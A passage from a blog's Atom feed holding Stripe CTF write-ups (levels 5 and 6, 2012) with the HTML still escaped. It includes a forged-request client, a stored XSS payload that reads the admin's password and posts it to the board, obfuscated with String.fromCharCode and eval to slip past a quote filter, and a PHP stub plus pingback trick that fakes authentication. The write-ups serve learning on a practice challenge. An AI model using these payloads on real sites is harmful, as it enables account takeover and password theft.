    &lt;span class="n"&gt;body&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;|sig:&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;signature&lt;/span&gt;

    &lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;StringIO&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;StringIO&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;curl_object&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pycurl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Curl&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;curl_object&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;setopt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pycurl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;URL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;endpoint&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/orders&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;curl_object&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;setopt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pycurl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;POST&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;curl_object&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;setopt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pycurl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;POSTFIELDS&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;body&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;curl_object&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;setopt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pycurl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;WRITEFUNCTION&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;curl_object&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;perform&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;curl_object&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="n"&gt;resp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getvalue&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;resp&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="n"&gt;order&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;__main__&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; python forged_client.py
&lt;span class="go"&gt;{&amp;quot;confirm_code&amp;quot;: &amp;quot;dummy-password&amp;quot;, &amp;quot;message&amp;quot;: &amp;quot;Great news: 10 liege&lt;/span&gt;
&lt;span class="go"&gt;waffles will soon be flying your way!&amp;quot;, &amp;quot;success&amp;quot;: true}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;w00t!&lt;/p&gt;
</content></entry><entry><title>Stripe CTF: Level #6</title><link href="https://allyourbase.utouch.fr/posts/2012/10/28/stripe-ctf-level-6/" rel="alternate"></link><published>2012-10-28T12:42:00+01:00</published><updated>2012-10-28T12:42:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2012-10-28:/posts/2012/10/28/stripe-ctf-level-6/</id><summary type="html">&lt;img alt="level06-logo.jpg" class="align-center" src="/images/stripe-ctf-level-6/level06-logo.jpg" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-6/stripe-ctf-level06.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256:
&lt;code&gt;0fed78164db1eced67ff8eeba0998c81901880b293667f63f74e2838e63d2bf3&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This level is a message board: you can share updates with your
friends. The only thing is, you can't put messages with quotes and
double quotes, in order to prevent SQL injection. You also can't change
your password, but …&lt;/p&gt;</summary><content type="html">&lt;img alt="level06-logo.jpg" class="align-center" src="/images/stripe-ctf-level-6/level06-logo.jpg" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-6/stripe-ctf-level06.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256:
&lt;code&gt;0fed78164db1eced67ff8eeba0998c81901880b293667f63f74e2838e63d2bf3&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This level is a message board: you can share updates with your
friends. The only thing is, you can't put messages with quotes and
double quotes, in order to prevent SQL injection. You also can't change
your password, but don't worry, it's visible on your profile page. Can
we use this to retrieve the admin's password?&lt;/p&gt;
&lt;p&gt;This level is a lot like level #4. When you post a message, the
server only checks for quotes and double quotes, not for script tags.
So, we can post a message consisting of javascript code which will
retrieve the password and post it on the board. But we can't use quotes
or double quotes: we'll have to obfuscate our code. And since the
admin's password contains quotes and double quotes, we'll have to
obfuscate it as well before we post it to the board. I chose to use
base64, and I found a javascript implementation
&lt;a class="reference external" href="http://www.webtoolkit.info/javascript-base64.html"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nx"&gt;pwn_password&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;xml_password&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nx"&gt;xml_password&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;XMLHttpRequest&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

    &lt;span class="nx"&gt;xml_password&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;GET&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/user_info&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;xml_password&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;password_page&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;xml_password&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;responseText&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;csrf_token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;new_post&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;elements&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;_csrf&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;params&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;title=password&amp;amp;body=&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
    &lt;span class="nx"&gt;escape&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;Base64&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;escape&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;password_page&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;amp;_csrf=&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
    &lt;span class="nx"&gt;escape&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;csrf_token&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;xml_post&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nx"&gt;xml_post&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;XMLHttpRequest&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

    &lt;span class="nx"&gt;xml_post&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;POST&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/posts&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;xml_post&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setRequestHeader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Content-Type&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s2"&gt;&amp;quot;application/x-www-form-urlencoded&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;xml_post&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setRequestHeader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Content-Length&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;params&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;xml_post&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setRequestHeader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Connection&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;keep-alive&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;xml_post&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;params&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nb"&gt;window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;onload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;pwn_password&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We'll obfuscate it using String.fromCharCode (the following result
contains also the base64 function):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;&lt;span class="nb"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;fromCharCode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;47&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[...]&lt;/span&gt; &lt;span class="mi"&gt;41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;125&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;));&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="c"&gt;&amp;lt;!-- The result is too big to be displayed entirely --&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's post this and wait for the admin to log in.&lt;/p&gt;
&lt;img alt="level06-form.png" class="align-center" src="/images/stripe-ctf-level-6/level06-form.png" /&gt;
&lt;p&gt;Now, we check the source code, and we see some base64-encoded stuff.&lt;/p&gt;
&lt;img alt="level06-source.png" class="align-center" src="/images/stripe-ctf-level-6/level06-source.png" /&gt;
&lt;p&gt;We just have to decode it.&lt;/p&gt;
&lt;img alt="level06-base64-decoded.png" class="align-center" src="/images/stripe-ctf-level-6/level06-base64-decoded.png" /&gt;
&lt;p&gt;We URL decode it, to clean a little bit:&lt;/p&gt;
&lt;img alt="level06-w00t.png" class="align-center" src="/images/stripe-ctf-level-6/level06-w00t.png" /&gt;
&lt;p&gt;w00t!&lt;/p&gt;
</content></entry><entry><title>Stripe CTF: Level #5</title><link href="https://allyourbase.utouch.fr/posts/2012/10/27/stripe-ctf-level-5/" rel="alternate"></link><published>2012-10-27T23:31:00+02:00</published><updated>2012-10-27T23:31:00+02:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2012-10-27:/posts/2012/10/27/stripe-ctf-level-5/</id><summary type="html">&lt;img alt="level05-logo.jpg" class="align-center" src="/images/stripe-ctf-level-5/level05-logo.jpg" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-5/stripe-ctf-level05.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256:
&lt;code&gt;82b066cca46fd24a16959ada973d6df0d7c693f7791a8b673add276f324a5885&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This level wants to solve a real problem: identification. We have too
many online accounts and we have to remember usernames/passwords for
everyone of them. It would be way simpler to be able to log into a new …&lt;/p&gt;</summary><content type="html">&lt;img alt="level05-logo.jpg" class="align-center" src="/images/stripe-ctf-level-5/level05-logo.jpg" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-5/stripe-ctf-level05.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256:
&lt;code&gt;82b066cca46fd24a16959ada973d6df0d7c693f7791a8b673add276f324a5885&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This level wants to solve a real problem: identification. We have too
many online accounts and we have to remember usernames/passwords for
everyone of them. It would be way simpler to be able to log into a new
web service using your Google account, or your Facebook account (kind of
like &lt;a class="reference external" href="https://en.wikipedia.org/wiki/OpenID"&gt;OpenID&lt;/a&gt;). That's what
this level is all about.&lt;/p&gt;
&lt;p&gt;This service asks for a pingback address (it's the service you want
to use to identify, like using Google or Facebook with OpenID), and your
username/password to this pingback. The form will then send your
credentials to the pingback and see if you're successfully
authenticated.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File srv.rb, line 20&lt;/span&gt;
&lt;span class="no"&gt;PASSWORD_HOSTS&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sr"&gt;/^level05-\d+\.stripe-ctf\.com$/&lt;/span&gt; &lt;span class="c1"&gt;# To get the password, the pingback must follow this regex&lt;/span&gt;
&lt;span class="no"&gt;ALLOWED_HOSTS&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sr"&gt;/\.stripe-ctf\.com$/&lt;/span&gt; &lt;span class="c1"&gt;# The pingback must follow this regex&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Note that these regex were for the real CTF. For a local usage, here are
what they look like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File srv.rb, line 23&lt;/span&gt;
&lt;span class="no"&gt;PASSWORD_HOSTS&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sr"&gt;/^localhost$/&lt;/span&gt; &lt;span class="c1"&gt;# To get the password, the pingback must follow this regex&lt;/span&gt;
&lt;span class="no"&gt;ALLOWED_HOSTS&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sr"&gt;//&lt;/span&gt; &lt;span class="c1"&gt;# No restriction on the allowed hosts&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can only use pingback URL ending in .stripe-ctf.com, but fortunately,
we still have access to the social network on level #2! We can upload a
PHP file, which will always say the authentication is successful.&lt;/p&gt;
&lt;p&gt;Note: on the next screenshots, I'll use 127.0.0.1 as the address for
level #2, and localhost as the address for level #5!&lt;/p&gt;
&lt;p&gt;So, how does the service know that we were successfully authenticated to
the pingback?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File srv.rb, line 109&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;authenticated?&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;body&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;body&lt;/span&gt; &lt;span class="o"&gt;=~&lt;/span&gt; &lt;span class="sr"&gt;/[^\w]AUTHENTICATED[^\w]*$/&lt;/span&gt;
&lt;span class="k"&gt;end&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, all we have to do is upload the following file to level #2:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot; AUTHENTICATED &lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="x"&gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's fill the form to use &lt;code&gt;level02-[numbers].stripe-ctf.com&lt;/code&gt;
as a pingback:&lt;/p&gt;
&lt;img alt="level05-first-form.png" class="align-center" src="/images/stripe-ctf-level-5/level05-first-form.png" /&gt;
&lt;p&gt;We submit, and here are the result of the authentication...&lt;/p&gt;
&lt;img alt="level05-first-login.png" class="align-center" src="/images/stripe-ctf-level-5/level05-first-login.png" /&gt;
&lt;p&gt;...and the new login page:&lt;/p&gt;
&lt;img alt="level05-first-authentication.png" class="align-center" src="/images/stripe-ctf-level-5/level05-first-authentication.png" /&gt;
&lt;p&gt;Okay, now we can authenticate using this script, but we can't recover
the password, cause the URL is
&lt;code&gt;level02-[numbers].stripe-ctf.com&lt;/code&gt;, and not
&lt;code&gt;level05-[numbers].stripe-ctf.com&lt;/code&gt;. The key is to see how the
server recovers the pingback URL we give him:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File srv.rb, line 67&lt;/span&gt;
&lt;span class="n"&gt;pingback&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="ss"&gt;:pingback&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="ss"&gt;:username&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;span class="n"&gt;password&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="ss"&gt;:password&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;
&lt;span class="o"&gt;[...]&lt;/span&gt;
&lt;span class="c1"&gt;# File srv.rb, line 80&lt;/span&gt;
&lt;span class="n"&gt;body&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;perform_authenticate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pingback&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[...]&lt;/span&gt;
&lt;span class="c1"&gt;# File srv.rb, line 99&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;perform_authenticate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="vg"&gt;$log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Sending request to &lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="no"&gt;RestClient&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="ss"&gt;:password&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                                     &lt;span class="ss"&gt;:username&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="n"&gt;body&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;body&lt;/span&gt;

    &lt;span class="vg"&gt;$log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Server responded with: &lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt;&lt;span class="n"&gt;body&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;body&lt;/span&gt;
&lt;span class="k"&gt;end&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The server uses &lt;code&gt;params&lt;/code&gt; to recover the informations sent by
the form. Then it &lt;code&gt;POST&lt;/code&gt; s the username and the password to the
to the pingback URL. But &lt;code&gt;params&lt;/code&gt; is the Ruby equivalent of
&lt;code&gt;$_REQUEST&lt;/code&gt; in PHP, which recovers the informations sent by
&lt;code&gt;POST&lt;/code&gt;, but also by &lt;code&gt;GET&lt;/code&gt;. So let's say we put this as
a pingback URL:
&lt;code&gt;http://leve05-[numbers].stripe-ctf.com?pingback=http://level02-[numbers].stripe-ctf.com&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Okay, here is where it gets tricky: the server retrieves the previous
URL as a pingback. It then posts our username/password to it, i.e. to
itself, since the address is
&lt;code&gt;level05-[numbers].stripe-ctf.com&lt;/code&gt;. So the server finds itself
with a username/password by &lt;code&gt;POST&lt;/code&gt;, and a pingback (the level
#2 URL) by &lt;code&gt;GET&lt;/code&gt;. So it does its business: sends the
username/password to the pingback.&lt;/p&gt;
&lt;p&gt;First we fill in the login:&lt;/p&gt;
